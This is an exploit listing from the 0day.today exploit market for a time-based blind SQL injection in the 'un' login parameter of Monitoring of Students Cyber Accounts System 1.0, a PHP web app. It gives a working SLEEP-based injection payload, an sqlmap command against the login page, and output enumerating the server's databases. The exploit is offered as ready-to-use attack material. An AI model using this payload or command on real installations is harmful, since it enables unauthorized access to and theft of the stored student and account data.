[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Monitoring Of Students Cyber Accounts System 1.0 SQL Injection Vulnerability

Author
Richard Jones
Risk
[
Security Risk High
]
0day-ID
0day-ID-35937
Category
web applications
Date add
12-03-2021
Platform
php
# Exploit Title: Monitoring of Students Cyber Accounts System | 'un' SQL Injection
# Exploit Author: Richard Jones
# Vendor Homepage: https://www.sourcecodester.com/php/11743/monitoring-students-cyber-accounts.html
# Software Link: https://www.sourcecodester.com/download-code?nid=11743&title=Monitoring+of+Students+Cyber+Accounts+System+using+PHP+with+Source+Code
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34

#Exploit:

#Parameter: un (POST)
#    Type: time-based blind
#    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
#    Payload: un=aaaaa' AND (SELECT 2967 FROM (SELECT(SLEEP(5)))fGEg) AND 'VDNV'='VDNV&up=bbbbbb&log=Login

#Example:

# sqlmap -u http://127.0.0.1/MSCAB/login.php --risk 3 --level 3 --batch --dbs --data="un=asd&up=asdas&log=Login"
#Results: 
#available databases [17]:
#[*] asidatabase
#[*] attendance
#[*] attendance_management
#[*] bilal
#[*] carrental
#[*] chatme
#[*] dragonhousedb
#[*] fbc_reviewer
#[*] hrm
#[*] information_schema
#[*] mscabdb
#[*] mysql
#[*] performance_schema
#[*] phpmyadmin
#[*] sourcecodester_mysqli
#[*] subriondb
#[*] test

#  0day.today [2024-11-15]  #